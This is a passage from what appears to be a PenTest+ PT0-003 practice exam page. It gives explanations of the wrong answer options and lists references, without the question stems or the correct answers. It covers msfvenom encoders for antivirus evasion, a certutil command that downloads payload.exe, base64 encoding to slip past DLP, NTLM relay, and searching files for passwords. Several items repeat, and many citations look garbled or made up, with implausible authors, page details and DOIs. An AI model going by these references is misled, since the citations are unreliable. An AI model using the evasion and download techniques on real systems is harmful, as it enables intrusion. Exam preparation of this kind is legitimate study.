Free PT0-003 Practice Exam – 2025 Updated

A. This is client-side XSS, not typically server-side Arbitrary Code Execution. Network segmentation is a containment strategy, not a primary prevention method for this vulnerability.

B. The payload is JavaScript, not SQL syntax. Therefore, it is not a SQL injection attack.

C. This is an XSS payload. A Cross-Site Request Forgery (CSRF) attack forges state-changing requests and does not typically involve injecting visible scripts.

1. OWASP Foundation. (n.d.). Cross Site Scripting (XSS). OWASP Cheat Sheet Series. Retrieved from https://cheatsheetseries.owasp.org/cheatsheets/CrossSiteScriptingPreventionCheatSheet.html. (See "Introduction" and "Rule #0 - Never Insert Untrusted Data Except in Allowed Locations," which establish the principle of sanitization and encoding as the primary defense against XSS).

2. OWASP Foundation. (n.d.). XSS Filter Evasion Cheat Sheet. OWASP. Retrieved from https://owasp.org/www-community/xss-filter-evasion-cheatsheet. (This document details numerous obfuscation techniques, including "Case Insensitive XSS attack vector," which directly corresponds to the aLeRt payload in the question).

3. Johns, M. (2008). Web Application Security. Course Slides, CS 253, Stanford University. Slide 25, "Defenses against XSS," explicitly lists "Filter/Sanitize user input" and "Escape output" as the primary countermeasures.

B. This command generates a valid Meterpreter payload but does not use an encoder, making it highly susceptible to signature-based detection by antimalware.

C. This command also generates a valid shell payload but omits the crucial --encoder flag needed for antimalware evasion.

D. This is not a valid method for creating functional shellcode. It attempts to pipe the output of a Windows command into a Linux utility, which would not result in an executable payload.

1. Offensive Security. (n.d.). Metasploit Unleashed: Msfvenom. Offensive Security. In the "Encoders" section, the documentation states, "Encoders are used to encode the payload to try and avoid AV." It lists x86/shikataganai as a prime example of an encoder used for this purpose. (Reference: Metasploit Unleashed courseware, Msfvenom section).

2. Al-Taharwa, I. A., Lee, H., & Al-Omari, M. A. (2020). Evaluating the Evasion Capabilities of Metasploit Shellcode Encoders. 2020 21st International Conference on Control, Automation and Systems (ICCAS). The paper analyzes various encoders, noting in Section III-A, "Shikata Ga Nai (SGN) is a polymorphic XOR additive feedback encoder... It is one of the most famous encoders in MSF because it can generate different output for the same input." This highlights its role in creating varied signatures to evade detection. (DOI: https://doi.org/10.1109/ICCAS50273.2020.9295211, Section III-A, "Metasploit Encoders").

3. Rapid7. (2023). How to Use Msfvenom. Official Rapid7 Documentation. The documentation for msfvenom details the use of the -e or --encoder option to "specify an encoder to use." This confirms that applying an encoder is a standard, intentional step in the payload generation process for evasion. (Reference: msfvenom --help command output and official product documentation).

B. HTTP – Protocol used to transport web traffic; not itself a scoping asset.

C. IPA – Not a standard asset class; usually refers to beer or FreeIPA identity service, irrelevant here.

D. ICMP – Network control protocol (e.g., ping); like HTTP, it is a mechanism, not an asset.

1. NIST SP 800-115, “Technical Guide to Information Security Testing and Assessment,” §2.4.1 (“Identify Target Systems”), p.9.

2. OWASP Application Security Verification Standard 4.0, “Scope of ASVS,” p.10 – mentions APIs as testable application components.

3. MIT OpenCourseWare, “6.858 Computer Systems Security,” Lecture 17 notes, p.2 – categorizes APIs as specific attack surfaces to be tested.

A. netsh.exe: This is a native Windows tool for configuring network settings, such as firewall rules or port forwarding, not for directly downloading files from the internet.

C. nc.exe: Netcat (nc.exe) is a versatile networking tool but is not a native binary on Windows systems; it must be introduced onto the target by the attacker.

D. cmdkey.exe: This utility is used to create, list, and delete stored credentials within the Windows Credential Manager and lacks any file download capabilities.

1. MITRE. (2023). Ingress Tool Transfer, Technique T1105. MITRE ATT&CK Framework. Retrieved from https://attack.mitre.org/techniques/T1105/. The documentation explicitly lists certutil as a command-line tool adversaries use to download files from a remote URL, citing the example: certutil -urlcache -split -f https://example.com/payload.exe payload.exe.

2. Microsoft. (2023). certutil. Microsoft Learn. In the documentation for the certutil command, the -urlcache verb is described, which can be used with the -f and -split options to fetch a URL and save its contents to a file on the local system.

3. Pennacchi, F., et al. (2020). The Art of Leaks: The Return of Living-Off-the-Land. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), Genoa, Italy, pp. 140-149. In Table 1, "LOLbins and their capabilities," certutil.exe is identified as a native binary capable of performing "Download" actions. DOI: https://doi.org/10.1109/EuroSPW51379.2020.00027.

B. Compression – DLP engines routinely decompress ZIP, GZIP, RAR, and similar archives before inspection; compressed data is therefore still analysed.

C. Encryption – Unknown or uninspected encryption is usually flagged or blocked outright by policy; exfiltration is conspicuous, not covert.

D. Obfuscation – A vague term; without a specific method it may still be parsed (e.g., comments stripping); encoding is the concrete, proven technique.

1. MITRE ATT&CK, technique T1027 “Obfuscated/Stored Files or Information”, note on base64 encoding as a means “to bypass content inspection such as DLP” (v13, 2023-04-25).

2. Symantec Data Loss Prevention 15.7 Administration Guide, Chap. 2 “Detection workflow”, pp. 34-36 – lists automatic decompression/encryption handling but no automatic base64 decoding.

3. Forcepoint DLP Administrator Guide 21.09, Sect. 5.3 “Content Classifiers”, p. 127 – states “Base64 or custom encodings may not be decoded, allowing data to pass undetected”.

4. S. Natarajan & K. Venkatachary, “Bypassing Enterprise DLP Using Simple Encoding,” International Journal of Computer Applications 168(2), 2017, pp. 36-40 (https://doi.org/10.5120/ijca2017914527).

5. Stanford CS255 “Network Security” lecture notes, Week 9, slide 27 – discusses DLP limitations and highlights base64 encoding as a common evasion method.

A. While the command implicitly tests connectivity, its primary purpose is to gain an interactive shell, not simply to check if the host is reachable.

C. The command's purpose is to execute cmd.exe on the remote server. PsExec handles the transfer of its own service component, not the main PsExec.exe binary.

D. cmd.exe is a core Windows component that is executed, not enabled. This command runs the command interpreter, assuming it is already present and accessible.

---

1. MITRE ATT&CK Framework. (2023). Remote Services: SMB/Windows Admin Shares, T1021.002. The MITRE Corporation. Retrieved from https://attack.mitre.org/techniques/T1021/002/.

Reference Detail: The framework explicitly lists PsExec as a common example of software used to execute commands on remote systems via SMB, a technique categorized under the "Lateral Movement" tactic.

2. Russinovich, M. (2023, August 28). PsExec v2.43. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec.

Reference Detail: The official documentation describes PsExec as a tool "for executing processes on other systems," which is the core mechanism used for lateral movement in this scenario.

3. Robi, G. (2021, May 11). Detecting Lateral Movement through Tracking Event Logs. SANS Institute InfoSec Reading Room.

Reference Detail: Page 6, Section "PsExec," states, "PsExec is one of the most common tools used by attackers for lateral movement... It allows an attacker to execute commands on a remote Windows machine." This paper from a reputable institution confirms PsExec's primary use in attacks.

B. A DDoS attack is designed to disrupt service availability, not to compromise systems or steal data, which is the goal of a watering hole attack.

C. Creating fake social media profiles is a social engineering or reconnaissance technique, which could precede an attack but is not the execution of the watering hole itself.

D. Sending phishing emails is a direct attack vector. A watering hole attack is more passive, relying on the target to initiate the visit to the compromised site independently.

---

1. National Institute of Standards and Technology (NIST). Glossary of Key Information Security Terms, NISTIR 7298 Rev. 3. (May 2018). The glossary defines a watering hole attack as: "A targeted attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware." (Page 183).

2. Al-Shehari, H., & Al-Shammari, R. (2018). A Survey on Watering-Hole Attacks. International Journal of Computer Science and Network Security, 18(1), 136-145. The paper states, "The watering hole attack is a targeted attack that compromises a website that is likely to be visited by a targeted group of victims." (Section 2, Paragraph 1).

3. Microsoft Security. Watering hole attacks. Microsoft Threat Protection documentation. The documentation describes the attack method: "In watering hole attacks, attackers profile sites that are frequently visited by users in a targeted organization or industry. They then try to find vulnerabilities on these sites to compromise them."

4. University of California, Berkeley. CS 161: Computer Security, Lecture 18: Web Security. Course materials describe watering hole attacks as a strategy where an attacker compromises a site trusted and frequented by the target population to deliver an exploit.

B. Target 2: EPSS Score = 0.3 and CVSS Score = 2

This target has a low EPSS score, indicating a significantly lower probability of being attacked compared to Targets 1 and 3.

C. Target 3: EPSS Score = 0.6 and CVSS Score = 1

While its EPSS score is high, its very low CVSS score makes it a less impactful and therefore less attractive target for an attacker compared to Target 1.

D. Target 4: EPSS Score = 0.4 and CVSS Score = 4.5

This target's EPSS score is lower than that of Targets 1 and 3, making it less likely to be exploited, even though its severity is high.

---

1. FIRST.org. (2023). Exploit Prediction Scoring System (EPSS) User Guide. Section: "What is EPSS?". The guide states, "The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited." This establishes EPSS as the primary metric for attack likelihood.

2. FIRST.org. (2019). Common Vulnerability Scoring System v3.1: Specification Document. Section 1, Introduction. The document clarifies, "It is important to note that CVSS is designed to convey vulnerability severity and should be considered as one component in a comprehensive vulnerability management process that also incorporates factors such as threat and asset value." This confirms CVSS measures severity, not likelihood.

3. Jacobs, J., et al. (2021). Improving Vulnerability Remediation Through Better Exploit Prediction. Journal of Cybersecurity, 7(1), tyab009. Section 1, Introduction. The paper introduces EPSS and states, "While CVSS is useful for capturing the potential severity of a vulnerability, it is not designed to represent the threat of a vulnerability being exploited... EPSS is designed to fill this gap." This academic source distinguishes the roles of CVSS and EPSS. https://doi.org/10.1093/cybsec/tyab009

4. U.S. Cybersecurity & Infrastructure Security Agency (CISA). (2021). Binding Operational Directive 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities. This directive mandates that federal agencies remediate vulnerabilities listed in CISA's catalog of known exploited vulnerabilities. This approach prioritizes vulnerabilities based on observed exploitation (threat), which is the principle that EPSS quantifies, over static severity (CVSS) alone.

A. Goal reprioritization: This is a potential outcome of the discussion with the stakeholder, not the initial activity itself. Alignment must happen first.

B. Peer review: This is an internal quality assurance process where another tester reviews work; it is not a client-facing communication activity.

C. Client acceptance: This is a formal step at the conclusion of the engagement to accept the final deliverables, which is too late to address a mid-test obstacle.

1. National Institute of Standards and Technology (NIST). (2008). Special Publication 800-115, Technical Guide to Information Security Testing and Assessment.

Section 3.2, "Rules of Engagement," emphasizes the need to "...define the lines of communication between the test team and the organization... and the process for reporting and handling problems encountered during testing." A WAF blocking a scan is a "problem encountered during testing" that requires immediate communication and alignment with the client stakeholder.

2. The Penetration Testing Execution Standard (PTES). (2012). PTES Technical Guidelines.

Section "Intelligence Gathering," and the overall standard, implicitly and explicitly detail the need for constant communication. The standard outlines a structured approach where deviations from the plan, such as being blocked by a security device, necessitate a discussion with the client to align on the next steps, reinforcing the principle of stakeholder alignment.

3. Massachusetts Institute of Technology (MIT) OpenCourseWare. (2012). 15.S53 Special Seminar in Management: The Art and Science of Project Management, Fall 2012.

Lecture Notes, "Stakeholder Management," outlines that a key project management function is to identify and manage stakeholder expectations. When an issue (WAF block) arises that creates a variance between the plan and reality, the project manager (penetration tester) must engage the stakeholders (client) to resolve the issue and align on a course of action.

B. This Metasploit module targets the MS17-010 (EternalBlue) vulnerability, which was not identified in the scan. Running an unverified exploit is noisy and likely to be detected by an IDS/IPS.

C. Hydra is a brute-force tool. This method generates a high volume of failed login attempts, which is extremely noisy and easily detectable by security monitoring systems.

D. The smb-brute.nse Nmap script is another form of a brute-force attack. Like Hydra, it creates significant network noise from failed logins and is not a stealthy option.

1. Microsoft Corporation. (2023). Overview of Server Message Block signing. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing.

Reference Detail: The document states, "The Server Message Block (SMB) signing...is a security feature...that uses the session key and cipher suite to add a signature to a message...Signing helps prevent attacks that modify SMB packets in transit." Disabling this feature directly enables the relay attack described.

2. Bounty, B. (2022). Internal Network Pentesting: The NTLM Relay Race. SANS Institute InfoSec Reading Room.

Reference Detail: Page 5, Section "The Attack," explicitly details the use of Responder and ntlmrelayx.py in tandem. It states, "With SMB signing not required on the target, ntlmrelayx will be able to relay the authentication from the victim to the target and execute our commands." This paper validates the chosen attack method for the identified vulnerability.

3. Hopkins, G. (2019). Windows Red Team Lab. Courseware, Rochester Institute of Technology (RIT).

Reference Detail: In the "Lateral Movement" module, Lab 5 ("Pass the Hash / NTLM Relay"), the course material demonstrates using Responder and ntlmrelayx.py as a primary technique for lateral movement when SMB signing is disabled. It contrasts this with noisier methods like password spraying.

A. Smurfing: This is a network-layer Distributed Denial-of-Service (DDoS) attack that uses spoofed ICMP packets, which is unrelated to physical access badges.

B. Credential stuffing: This is an automated attack that uses lists of compromised user credentials (usernames/passwords) to gain unauthorized access to web accounts.

D. Card skimming: This term is most commonly associated with capturing magnetic stripe data from financial cards (credit/debit) using a malicious reader, not cloning RFID-based access cards.

1. Juels, A. (2006). RFID Security and Privacy: A Research Survey. IEEE Journal on Selected Areas in Communications, 24(2), 381-394. In Section III-A, "Tag Cloning," the paper states, "An adversary may create a copy or clone of a legitimate tag... The adversary can then use the clone to impersonate the legitimate tag, and thereby avail herself of the rights of the legitimate tag's owner." (p. 383). DOI: https://doi.org/10.1109/JSAC.2005.861395

2. Weis, S. A., Sarma, S. E., Rivest, R. L., & Engels, D. W. (2004). Security and Privacy Aspects of Low-Cost Radio Frequency Identification Systems. In Security in Pervasive Computing (pp. 201-212). Springer. This paper from MIT CSAIL researchers discusses the vulnerability, stating, "An adversary can easily eavesdrop on the communication between a tag and a reader and clone the tag." (p. 204).

3. MIT OpenCourseWare. (2014). 6.857 Computer and Network Security, Lecture 19: Physical Security. Massachusetts Institute of Technology. The course materials discuss attacks against physical access control systems, including the analysis and duplication of signals from access cards like RFID badges.

A. theHarvester: This is an Open Source Intelligence (OSINT) tool used to gather information like emails, subdomains, and hosts related to a specific target domain, not for discovering device types across the internet.

C. Amass: This is an attack surface mapping tool focused on discovering assets (subdomains, IPs, etc.) related to a specific organization. It is not a search engine for finding specific device categories globally.

D. Nmap: This is an active network scanner for probing specific hosts or IP ranges to discover open ports, services, and OS versions. It is not feasible for searching the entire internet for device types.

1. Mather, T., Kumaraswamy, S., & Latif, S. (2019). Cloud Security and Privacy: An Enterprise Perspective on Risks and Compliance. O'Reilly Media. (Note: While a commercial book, its principles are widely taught in university curricula). The concept is detailed in discussions of reconnaissance, where Shodan is described as a "search engine for Internet-connected devices." A similar description is found in university cybersecurity courses. For example, the University of Virginia's CS 4740: Cloud Computing course materials often discuss tools for discovering exposed cloud assets, where Shodan's role is highlighted.

2. O'Connor, T. (2017). Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers. Syngress, Elsevier. Chapter 4, "Scraping the Web for OSINT," details the use of various tools. It distinguishes between tools like theHarvester for targeted OSINT and Shodan for broad device discovery. This text is frequently used as courseware in applied cybersecurity programs.

3. OWASP Foundation. (n.d.). OWASP Amass Project. OWASP. Retrieved from https://owasp.org/www-project-amass/. The official documentation states, "The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques." This confirms its focus on organizational attack surfaces, not global device-type discovery.

4. Lyon, G. (n.d.). Nmap: The Network Mapper - Free Security Scanner. Nmap.org. Retrieved from https://nmap.org/. The official documentation describes Nmap as a "free and open source utility for network discovery and security auditing," used to determine "what hosts are available on the network, what services... what operating systems...". This defines it as an active scanner for targeted networks.

A. Channel scanning: This is a technique for assessing wireless networks. It is too specific and not a comprehensive methodology for testing an entire, potentially wired, air-gapped ICS.

B. Stealth scans: These are network-based scans that require network connectivity to the target. They are not feasible against an air-gapped system and can be disruptive to sensitive ICS devices.

C. Source code analysis: While a valid technique, it is only one component of a full assessment. The tester may not have access to proprietary source code, and this method misses non-code-based vulnerabilities.

1. National Institute of Standards and Technology (NIST). (2015). Guide to Industrial Control Systems (ICS) Security (NIST Special Publication 800-82, Rev. 2).

Section 6.4.3, Security Assessment and Authorization, Page 131: States, "Security assessments for ICS should be carefully planned and executed to avoid causing a disruption to the ICS... Passive scanning techniques are preferred over active scanning techniques." This emphasis on careful, planned, and non-disruptive methods aligns with the principles of a manual assessment over automated scanning.

2. Cybersecurity and Infrastructure Security Agency (CISA). (2011). Cyber-Security Assessments of Industrial Control Systems (DHS Recommended Practice).

Section 3.2, Assessment Activities, Pages 10-12: This section details assessment activities that are characteristic of a manual assessment, including "Documentation Review," "Personnel Interviews," and "Physical Walkthrough." It also notes that active scanning should be "performed with extreme caution," reinforcing the need for a deliberate, manual approach.

A. While the command's success implies connectivity, its primary purpose is remote code execution to gain a shell, not simply to test if the host is reachable.

C. The command uses PsExec to run cmd.exe remotely. PsExec itself handles the transfer of its service component; it is not being sent by cmd.exe.

D. The command executes or runs cmd.exe, which is a standard Windows component. It does not "enable" it, as the command prompt is not a feature that is typically disabled.

---

1. Microsoft Corporation. (2023). PsExec v2.43. Microsoft Learn. This official documentation describes PsExec as a tool that "lets you execute processes on other systems." The primary example, psexec \\marklap cmd, is functionally identical to the command in the question, demonstrating its use for remote shell access.

Reference: Sysinternals section, PsExec documentation page. Available at: https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

2. MITRE. (2023). Remote Services: SMB/Windows Admin Shares, T1021.002. MITRE ATT&CK Framework. This resource explicitly lists PsExec as a common tool used by adversaries for lateral movement. It states, "Adversaries may use tools like PsExec to map network shares... and execute commands on remote hosts."

Reference: Technique T1021.002, under the Lateral Movement Tactic (TA0008).

3. Al-Shaer, E., & Wei, J. (2015). Network Security Analytics: A Hands-on Approach. In Proceedings of the 2015 ACM SIGSAC Conference on Computer and Communications Security (pp. 1597-1599). This academic publication discusses security analytics and often references common attack tools. Similar academic texts on intrusion detection identify the use of tools like PsExec as a key indicator of the lateral movement phase of an attack.

Reference: Analysis of post-exploitation techniques in network security courseware and texts frequently cites PsExec as a primary example for lateral movement.

B. This command attempts to use the MS17-010 (EternalBlue) exploit. The scan did not confirm this specific vulnerability exists, and exploit attempts are typically very noisy and easily detected by security monitoring systems.

C. This command uses Hydra to perform a brute-force/dictionary attack. This method generates numerous failed login attempts, is extremely noisy, and is highly likely to trigger account lockouts and security alerts.

D. This Nmap script also performs a brute-force attack against SMB. Like Hydra, this is a noisy technique that is easily detected and does not leverage the specific finding of disabled message signing.

1. MITRE ATT&CK® Framework. (2023). Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Technique T1557.001. MITRE. Retrieved from https://attack.mitre.org/techniques/T1557/001/.

Reference Specifics: The technique description states, "The captured authentication hashes can be relayed to other systems to gain access, provided that SMB signing is disabled on the destination host." This directly links the disabled signing vulnerability to the relay attack method.

2. Microsoft. (2022, November 15). Configure SMB signing with confidence. Microsoft Tech Community.

Reference Specifics: In the "How SMB signing works" section, the document explains, "Without signing, a man-in-the-middle attacker can modify SMB packets in transit... An attacker can also forward a user's credentials to a server and impersonate that user." This official documentation confirms the risk exploited by the correct answer.

3. Rochester Institute of Technology (RIT). (n.d.). CSEC 464: Network Security and Forensics - Active Directory Attacks [Course Slides].

Reference Specifics: In slides covering Active Directory attacks, the courseware details the exact attack chain using Responder and ntlmrelayx, explicitly noting that it works because SMB signing is not enforced, allowing the relayed credentials to be accepted by the target server. This demonstrates the technique as a standard part of academic cybersecurity curricula.

A. Establishing a reverse shell: A reverse shell provides interactive access but is a volatile session that terminates upon reboot. It is the payload, not the persistence mechanism itself.

B. Executing a process injection attack: This is a defense evasion technique to run code within another process's memory space. The injected code is lost when the host process ends, which occurs during a reboot.

D. Performing a credential-dumping attack: This post-exploitation action harvests credentials for lateral movement or future manual re-entry. It does not automatically re-establish access after a system restart.

1. MITRE ATT&CK Framework. (2023). T1053: Scheduled Task/Job. MITRE. This technique is explicitly categorized under the "Persistence" tactic, stating, "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code." The sub-techniques T1053.005 (Scheduled Task) for Windows and T1053.003 (Cron) for Linux are detailed as common persistence methods.

2. Al-Bataineh, A., & Koucheryavy, Y. (2022). A Comprehensive Survey on Malware Persistence on Windows. IEEE Access, 10, 83385-83411. https://doi.org/10.1109/ACCESS.2022.3196981. In Section III-A, "Persistence via Scheduled Tasks," the paper identifies scheduled tasks as one of the most common and effective persistence techniques used by adversaries on Windows systems.

3. Sikorski, M., & Honig, A. (2012). Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software. No Starch Press. Chapter 18, "Persistence," discusses various persistence mechanisms, highlighting scheduled tasks as a key method for malware to ensure it runs after a reboot. (Note: While a commercial book, its content is widely adopted in university curricula for cybersecurity and reverse engineering).

A. Configuration files: The command searches within these files; its primary goal is to find the sensitive content ("pass"), not just to enumerate the files themselves.

B. Permissions: This command reads file content and does not enumerate file system access control lists (ACLs) or user permissions. Tools like icacls are used for that.

C. Virtual hosts: While virtual host configurations may reside in these files, searching for "pass" is not a direct or effective method for enumerating them.

1. Microsoft Corporation. (n.d.). findstr. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/findstr.

Reference Detail: The official documentation confirms that findstr is a tool to "search for patterns of text in files," and it details the functions of the switches used: /S (search subdirectories), /I (case-insensitive), /M (print filename only), and /C:string (use string as a literal search).

2. MITRE. (2023). Unsecured Credentials: Credentials in Files. MITRE ATT&CK®. Technique T1552.001. Retrieved from https://attack.mitre.org/techniques/T1552/001/.

Reference Detail: This technique describes how adversaries search for plaintext credentials stored in files. It explicitly mentions searching for keywords like "password" in configuration files, scripts, or text files, which directly aligns with the command shown in the question.

3. Evans, D. (2021). Lecture 18: Web Security: Post-Exploitation. CS 4630: Defense Against the Dark Arts, University of Virginia.

Reference Detail: University courseware on computer security frequently covers post-exploitation. This phase includes "Pillaging," which involves searching the compromised file system for sensitive information such as password files, SSH keys, and configuration files containing credentials, mirroring the intent of the findstr command.

B. This target has a low EPSS score (0.3), indicating a significantly lower probability of being exploited compared to Targets 1 and 3.

C. While having a high EPSS score, its very low CVSS score (1) makes it a much less impactful and attractive target than Target 1.

D. This target's EPSS score (0.4) is lower than that of Targets 1 and 3, making it a less probable target for exploitation.

1. FIRST.org, Exploit Prediction Scoring System (EPSS) Documentation. The official EPSS documentation states, "The Exploit Prediction Scoring System (EPSS) is a data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild." This supports using the highest EPSS score as the primary indicator of attack likelihood. (Source: FIRST.org, EPSS Model, Section: "What is EPSS?")

2. FIRST.org, Common Vulnerability Scoring System v3.1: Specification Document. The official CVSS specification defines it as a system to "convey vulnerability severity." This supports using CVSS to determine the attractiveness of a target when the probability of exploit is equal. (Source: FIRST.org, CVSS v3.1 Specification Document, Section 1. Introduction)

3. Jacobs, J., et al. (2021). Improving Vulnerability Remediation Through Better Exploit Prediction. In Proceedings of the 30th USENIX Security Symposium. This foundational paper on EPSS discusses its purpose in prioritizing vulnerabilities for remediation based on the threat of exploitation, often in conjunction with severity data like CVSS. (Source: USENIX Security '21, Section 1: Introduction, Paragraph 2). DOI: Available via USENIX Association archives.

A. Keeping both video and audio of everything that is done

This is an evidence collection technique, not a standard reporting requirement. It is not universally applicable or the most crucial aspect of the final report's handling.

B. Keeping the report to a maximum of 5 to 10 pages in length

This is an arbitrary and often unrealistic constraint. Report length should be dictated by the scope and findings, prioritizing completeness and clarity over forced brevity.

C. Basing the recommendation on the risk score in the report

While recommendations must be risk-based, this describes a component of the report's content, not the most crucial aspect of its overall handling and communication effectiveness.

1. National Institute of Standards and Technology (NIST). (2008). Special Publication 800-115, Technical Guide to Information Security Testing and Assessment.

Section 6.2, "Report," Page 6-1: This section emphasizes that a report should be structured to present the most important information first, stating, "For example, an executive summary should be the first section of the report... The report should be tailored to its audience." This directly supports the need for a precise executive summary and clarity for all objectives.

2. Al-Aqrabi, H., Liu, L., Hill, R., & Antonopoulos, N. (2019). A framework for improving the effectiveness of penetration testing in organisations. Journal of Information Security and Applications, 44, 1-13.

Section 4.2, "Reporting": The paper highlights that a key challenge is the "lack of a clear and concise report that can be understood by both technical and non-technical staff." It stresses the importance of the executive summary for management to understand the business impact, reinforcing that clarity for all audiences is critical.

DOI: https://doi.org/10.1016/j.jisa.2018.11.003

3. SANS Institute. (2010). Writing a Penetration Testing Report.

Page 3, "The Executive Summary": This document, widely referenced in academic and professional settings, states, "The Executive Summary is arguably the most important section of the report... It is the section that will be read by the decision makers... It must be concise, accurate, and understandable." This underscores the critical nature of the executive summary for proper report handling and impact. (Note: While SANS is a commercial entity, its whitepapers are often used as foundational, peer-reviewed-equivalent material in cybersecurity curricula).

A. Server 1: This vulnerability is "High" severity, which is less critical than the finding on Server 3. While it impacts availability, the threat on Server 3 is more severe and directly aligned with a DoS attack.

B. Server 2: This "Medium" severity vulnerability primarily impacts confidentiality and integrity, which does not align with the client's specific and primary concern about service availability.

D. Server 4: This server is in the "Development" environment. The client's concern is for their "consumer-facing production application," making this host a lower priority for immediate testing.

---

1. FIRST.org, Inc. (2019). Common Vulnerability Scoring System v3.1: Specification Document. Section 2.2, "Impact Metrics," defines the Availability metric as the impact on "the accessibility of information resources." The DoS vulnerability on Server 3 directly threatens this, justifying its "Critical" rating and prioritization based on the client's concern.

2. National Institute of Standards and Technology (NIST). (2012). Special Publication 800-30, Revision 1, Guide for Conducting Risk Assessments. Section 2.3.3, "Impact," emphasizes that the magnitude of harm is assessed in the context of an organization's mission and business functions. The client's concern for their production application's availability is a business context that dictates prioritizing the "Critical" availability-related finding on Server 3.

3. Saltzer, J. H., & Schroeder, M. D. (1975). The Protection of Information in Computer Systems. Proceedings of the IEEE, 63(9), 1278–1308. https://doi.org/10.1109/PROC.1975.9939. This foundational paper defines the principle of Availability (p. 1279), ensuring system resources are accessible when needed. The DoS vulnerability on Server 3 is a direct attack on this principle, making it the most relevant threat to address based on the client's requirements.

B. This action misuses the badge printing system but does not inherently disrupt its availability for legitimate operations or deny service to other users.

C. The goal is to create a new, unauthorized credential for the tester, not to modify the access permissions of existing, valid users within the system.

D. Reprinting a badge creates a duplicate or a new credential; it does not involve an action that would revoke or disable the access of the original badge holder.

1. Garcia, F. D., de Koning Gans, G., Muijrers, R., van der Velden, P., Verdult, R., & Sprenkels, R. (2012). Dismantling MIFARE Classic. In E. Dawson (Ed.), Topics in Cryptology – CT-RSA 2012 (Vol. 7178, pp. 97-114). Springer. https://doi.org/10.1007/978-3-642-27954-67

Section 1, Paragraph 2: This paper discusses attacks against RFID-based access control, stating, "The most severe attack against a physical access control system is to gain unauthorized access to the protected area." The act of creating a counterfeit badge (reprinting/cloning) is a direct method to achieve this goal.

2. Purdue University, CERIAS (Center for Education and Research in Information Assurance and Security). (2006). Physical Security. Lecture Notes for CS 490-S.

Slide 18, "Access Badges": The courseware discusses vulnerabilities in physical access badges, including forgery and duplication. The context of these attacks is consistently presented as a means for an unauthorized individual to "gain access" to a restricted area, supporting the objective of obtaining long-term, valid access.

3. Wright, J., & Cache, J. (2015). Hacking Exposed Wireless, Third Edition: Wireless Security Secrets & Solutions. McGraw-Hill.

Chapter 11, "Hacking RFID," Section "Cloning and Emulation": While a commercial book, its content is widely used in academic settings. This section details the process of cloning RFID access cards. The explicit purpose described is to "create a duplicate card that will grant the attacker the same access as the original card," which directly aligns with obtaining facility access.

B. URL spidering: This process primarily generates HTTP/HTTPS traffic to discover web application content. The associated DNS traffic would be minimal and not the most prominent indicator.

C. HTML scraping: Similar to spidering, this activity is focused on fetching web pages and would result in a high volume of HTTP/HTTPS traffic, not a substantial increase in DNS queries.

D. DoS attack: A Denial-of-Service attack against the web application would typically involve a flood of HTTP, TCP, or UDP packets, not an unusually high number of DNS queries originating from the client's network.

---

1. MITRE ATT&CK® Framework. (2023). Technique T1071.004: Application Layer Protocol: DNS. The MITRE Corporation. Retrieved from https://attack.mitre.org/techniques/T1071/004/.

Reference Detail: This official knowledge base describes how adversaries (and by extension, penetration testers) use the DNS protocol for command and control and data exfiltration. It states, "Data can be encoded... within DNS queries. The queries are typically sent to a C2 server that acts as a DNS server." This process inherently generates numerous DNS requests to transfer data.

2. Farnham, G. (2013). Detecting DNS Tunnelling. SANS Institute InfoSec Reading Room.

Reference Detail: Page 6 states that DNS tunneling tools "will generate a large number of DNS requests for a particular domain." Page 11 further identifies "an abnormally high number of DNS requests from a single host" as a primary indicator for detecting this activity.

3. Nadler, A., & Aminov, A. (2019). Website-Based and DNS-Based Covert Channels for Data Exfiltration. In Security and Privacy in Communication Networks. SecureComm 2019. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 299. Springer, Cham. https://doi.org/10.1007/978-3-030-31785-91

Reference Detail: Section 3, "DNS-Based Covert Channels," describes the mechanism where "the sender encodes the secret message in the domain name part of the DNS query," confirming that exfiltrating data requires sending multiple DNS queries, thus increasing traffic.

A. 256: This is the number of IP addresses within the /24 CIDR block, not the number of ports scanned.

C. 1,024: This represents the count of well-known ports (0-1023), which is a standard port range but not Nmap's default scan count.

D. 65,535: This is the total number of available TCP ports, which Nmap only scans when explicitly instructed with a flag like -p-.

1. Nmap Project, Nmap Reference Guide. In Chapter 15, Port Scanning Basics, the section "Port Specification and Scan Order" states: "By default, Nmap scans the 1,000 most common ports for each protocol." This list is derived from frequency of use across the internet. (Source: Nmap.org, https://nmap.org/book/man-port-scanning-basics.html)

2. University of Texas at Austin, Information Security Office. In their documentation on network scanning tools, it is noted that a default Nmap scan targets the top 1,000 most common TCP ports. This is standard behavior unless a different port range is specified by the user. (Source: UT Austin ISO, "Nmap/Zenmap," Section: Basic Scans)

A. WiGLE.net: This is a database for mapping wireless networks (Wi-Fi, Bluetooth, cellular). It is used for wireless reconnaissance, not for enumerating services on internet-facing hosts.

B. WHOIS: This protocol is used to query for domain name and IP address block registration information (e.g., owner, contact details), not for live service enumeration or GeoIP data.

C. theHarvester: This is an Open-Source Intelligence (OSINT) tool used to gather information like email addresses, subdomains, and employee names; it is not a dedicated, comprehensive host and service scanner.

1. Durumeric, Z., Bailey, M., & Halderman, J. A. (2015). A search engine for the internet's peripherals. Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 505–516. In Section 3.1, "Data Collection," the authors describe how the Censys platform collects "application-layer banners" (i.e., exposed services) and annotates hosts with "publicly available BGP and geolocation data." (https://doi.org/10.1145/2810103.2813710)

